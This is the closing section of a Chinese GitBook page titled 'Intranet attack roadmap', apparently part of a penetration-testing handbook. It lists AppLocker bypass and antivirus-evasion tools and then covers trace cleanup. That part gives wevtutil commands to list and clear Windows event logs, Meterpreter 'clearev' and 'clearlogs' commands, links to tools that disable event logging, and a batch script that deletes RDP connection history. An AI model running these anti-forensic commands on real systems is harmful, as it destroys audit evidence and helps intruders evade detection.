<h3 id="bypass-applocker"><a name="bypass-applocker" class="anchor-navigation-ex-anchor" href="#bypass-applocker"><i class="fa fa-link" aria-hidden="true"></i></a>Bypass Applocker</h3>
<p><a href="https://github.com/api0cradle/UltimateAppLockerByPassList" target="_blank">UltimateAppLockerByPassList </a>
<a href="https://lolbas-project.github.io/" target="_blank">https://lolbas-project.github.io/</a> </p>
<h3 id="bypassav"><a name="bypassav" class="anchor-navigation-ex-anchor" href="#bypassav"><i class="fa fa-link" aria-hidden="true"></i></a>bypassAV</h3>
<ul>
<li>Empire </li>
<li>PEspin </li>
<li>Shellter </li>
<li>Ebowla </li>
<li>Veil </li>
<li>PowerShell </li>
<li>Python </li>
<li><a href="http://www.4hou.com/technology/9379.html" target="_blank">&#x4EE3;&#x7801;&#x6CE8;&#x5165;&#x6280;&#x672F;Process Doppelg&#xE4;nging </a></li>
<li>...</li>
</ul>
<h1 id="&#x75D5;&#x8FF9;&#x6E05;&#x7406;"><a name="&#x75D5;&#x8FF9;&#x6E05;&#x7406;" class="anchor-navigation-ex-anchor" href="#&#x75D5;&#x8FF9;&#x6E05;&#x7406;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x75D5;&#x8FF9;&#x6E05;&#x7406;</h1>
<h2 id="windows&#x65E5;&#x5FD7;&#x6E05;&#x9664;"><a name="windows&#x65E5;&#x5FD7;&#x6E05;&#x9664;" class="anchor-navigation-ex-anchor" href="#windows&#x65E5;&#x5FD7;&#x6E05;&#x9664;"><i class="fa fa-link" aria-hidden="true"></i></a><a href="https://3gstudent.github.io/3gstudent.github.io/%E6%B8%97%E9%80%8F%E6%8A%80%E5%B7%A7-Windows%E6%97%A5%E5%BF%97%E7%9A%84%E5%88%A0%E9%99%A4%E4%B8%8E%E7%BB%95%E8%BF%87/" target="_blank">Windows&#x65E5;&#x5FD7;&#x6E05;&#x9664;</a></h2>
<p>&#x83B7;&#x53D6;&#x65E5;&#x5FD7;&#x5206;&#x7C7B;&#x5217;&#x8868;&#xFF1A;</p>
<pre class="language-"><code>wevtutil el &gt;1.txt
</code></pre><p>&#x83B7;&#x53D6;&#x5355;&#x4E2A;&#x65E5;&#x5FD7;&#x7C7B;&#x522B;&#x7684;&#x7EDF;&#x8BA1;&#x4FE1;&#x606F;&#xFF1A;
eg.</p>
<pre class="language-"><code>wevtutil gli &quot;windows powershell&quot;
</code></pre><p>&#x56DE;&#x663E;&#xFF1A;</p>
<pre class="language-"><code>creationTime: 2016-11-28T06:01:37.986Z
lastAccessTime: 2016-11-28T06:01:37.986Z
lastWriteTime: 2017-08-08T08:01:20.979Z
fileSize: 1118208
attributes: 32
numberOfLogRecords: 1228
oldestRecordNumber: 1
</code></pre><p>&#x67E5;&#x770B;&#x6307;&#x5B9A;&#x65E5;&#x5FD7;&#x7684;&#x5177;&#x4F53;&#x5185;&#x5BB9;&#xFF1A;</p>
<pre class="language-"><code>wevtutil qe /f:text &quot;windows powershell&quot;
</code></pre><p>&#x5220;&#x9664;&#x5355;&#x4E2A;&#x65E5;&#x5FD7;&#x7C7B;&#x522B;&#x7684;&#x6240;&#x6709;&#x4FE1;&#x606F;&#xFF1A;</p>
<pre class="language-"><code>wevtutil cl &quot;windows powershell&quot;
</code></pre><h2 id="&#x7834;&#x574F;windows&#x65E5;&#x5FD7;&#x8BB0;&#x5F55;&#x529F;&#x80FD;"><a name="&#x7834;&#x574F;windows&#x65E5;&#x5FD7;&#x8BB0;&#x5F55;&#x529F;&#x80FD;" class="anchor-navigation-ex-anchor" href="#&#x7834;&#x574F;windows&#x65E5;&#x5FD7;&#x8BB0;&#x5F55;&#x529F;&#x80FD;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x7834;&#x574F;Windows&#x65E5;&#x5FD7;&#x8BB0;&#x5F55;&#x529F;&#x80FD;</h2>
<p>&#x5229;&#x7528;&#x5DE5;&#x5177; </p>
<ul>
<li><a href="https://github.com/hlldz/Invoke-Phant0m" target="_blank">Invoke-Phant0m</a> </li>
<li><a href="https://github.com/3gstudent/Windwos-EventLog-Bypass" target="_blank">Windwos-EventLog-Bypass</a> </li>
</ul>
<h2 id="msf"><a name="msf" class="anchor-navigation-ex-anchor" href="#msf"><i class="fa fa-link" aria-hidden="true"></i></a>msf</h2>
<pre class="language-"><code>run clearlogs
</code></pre><pre class="language-"><code>clearev
</code></pre><h2 id="3389&#x767B;&#x9646;&#x8BB0;&#x5F55;&#x6E05;&#x9664;"><a name="3389&#x767B;&#x9646;&#x8BB0;&#x5F55;&#x6E05;&#x9664;" class="anchor-navigation-ex-anchor" href="#3389&#x767B;&#x9646;&#x8BB0;&#x5F55;&#x6E05;&#x9664;"><i class="fa fa-link" aria-hidden="true"></i></a>3389&#x767B;&#x9646;&#x8BB0;&#x5F55;&#x6E05;&#x9664;</h2>
<pre class="language-"><code>@echo off
@reg delete &quot;HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default&quot; /va /f
@del &quot;%USERPROFILE%\My Documents\Default.rdp&quot; /a
@exit
</code></pre><footer class="page-footer"><span class="copyright">Copyright &#xA9; DarkNote 2020. QQ&#x8BA8;&#x8BBA;&#x7FA4;&#xFF1A;10000</span><span class="footer-modification">&#x8BE5;&#x6587;&#x4EF6;&#x4FEE;&#x8BA2;&#x65F6;&#x95F4;&#xFF1A;
2020-03-07 20:56:34
</span></footer>
                                
                                </section>
                            
    </div>
    <div class="search-results">
        <div class="has-results">
            
            <h1 class="search-results-title"><span class='search-results-count'></span> results matching "<span class='search-query'></span>"</h1>
            <ul class="search-results-list"></ul>
            
        </div>
        <div class="no-results">
            
            <h1 class="search-results-title">No results matching "<span class='search-query'></span>"</h1>
            
        </div>
    </div>
</div>

                        </div>
                    </div>
                
            </div>

            
                
                <a href="./" class="navigation navigation-prev navigation-unique" aria-label="Previous page: 外部资料">
                    <i class="fa fa-angle-left"></i>
                </a>
                
                
            
        
    </div>

    <script>
        var gitbook = gitbook || [];
        gitbook.push(function() {
            gitbook.page.hasChanged({"page":{"title":"内网攻击路线图","level":"6.1.1","depth":2,"previous":{"title":"外部资料","level":"6.1","depth":1,"path":"Chapter99/README.md","ref":"Chapter99/README.md","articles":[{"title":"内网攻击路线图","level":"6.1.1","depth":2,"path":"Chapter99/内网攻击路线图.md","ref":"Chapter99/内网攻击路线图.md","articles":[]}]},"dir":"ltr"},"config":{"plugins":["theme-comscore","prism","-highlight","copy-code-button","search-pro","-search","-lunr","expandable-chapters","splitter","-sharing","tbfed-pagefooter","baidu-tongji","anchor-navigation-ex"],"styles":{"website":"./static/common.css"},"pluginsConfig":{"tbfed-pagefooter":{"copyright":"Copyright &copy DarkNote 2020. QQ讨论群：10000","modify_label":"该文件修订时间：","modify_format":"YYYY-MM-DD HH:mm:ss"},"prism":{"css":["prismjs/themes/prism-solarizedlight.css"],"lang":{"shell":"bash"}},"baidu-tongji":{"url":"https://hm.baidu.com/hm.js","token":"xxxxxxxxxxxxxxxxxxxxxxxxxxx"},"splitter":{},"search-pro":{},"fontsettings":{"theme":"white","family":"sans","size":2},"anchor-navigation-ex":{"associatedWithSummary":true,"float":{"floatIcon":"fa fa-navicon","level1Icon":"","level2Icon":"","level3Icon":"","showLevelIcon":false},"mode":"float","multipleH1":true,"pageTop":{"level1Icon":"","level2Icon":"","level3Icon":"","showLevelIcon":false},"printLog":false,"showGoTop":true,"showLevel":false},"theme-comscore":{},"copy-code-button":{},"theme-default":{"styles":{"website":"styles/website.css","pdf":"styles/pdf.css","epub":"styles/epub.css","mobi":"styles/mobi.css","ebook":"styles/ebook.css","print":"styles/print.css"},"showLevel":true},"expandable-chapters":{}},"theme":"default","author":"DarkN0te","pdf":{"pageNumbers":true,"fontSize":12,"fontFamily":"Arial","paperSize":"a4","chapterMark":"pagebreak","pageBreaksBefore":"/","margin":{"right":62,"left":62,"top":56,"bottom":56}},"structure":{"langs":"LANGS.md","readme":"README.md","glossary":"GLOSSARY.md","summary":"SUMMARY.md"},"variables":{},"title":"网络安全大百科","language":"zh-hans","gitbook":"*","description":"从零开始的网络安全大百科，总有你的需要"},"file":{"path":"Chapter99/内网攻击路线图.md","mtime":"2020-03-07T12:56:34.206Z","type":"markdown"},"gitbook":{"version":"3.2.3","time":"2020-03-07T12:58:58.155Z"},"basePath":"..","book":{"language":""}});
        });
    </script>
</div>

        
    <script src="../gitbook/gitbook.js"></script>
    <script src="../gitbook/theme.js"></script>
    
        
        <script src="../gitbook/gitbook-plugin-copy-code-button/toggle.js"></script>
        
    
        
        <script src="../gitbook/gitbook-plugin-search-pro/jquery.mark.min.js"></script>
        
    
        
        <script src="../gitbook/gitbook-plugin-search-pro/search.js"></script>
        
    
        
        <script src="../gitbook/gitbook-plugin-expandable-chapters/expandable-chapters.js"></script>
        
    
        
        <script src="../gitbook/gitbook-plugin-splitter/splitter.js"></script>
        
    
        
        <script src="../gitbook/gitbook-plugin-baidu-tongji/plugin.js"></script>
        
    
        
        <script src="../gitbook/gitbook-plugin-fontsettings/fontsettings.js"></script>
        
    
        
        <script src="../gitbook/gitbook-plugin-theme-comscore/test.js"></script>
        
    

    </body>
</html>

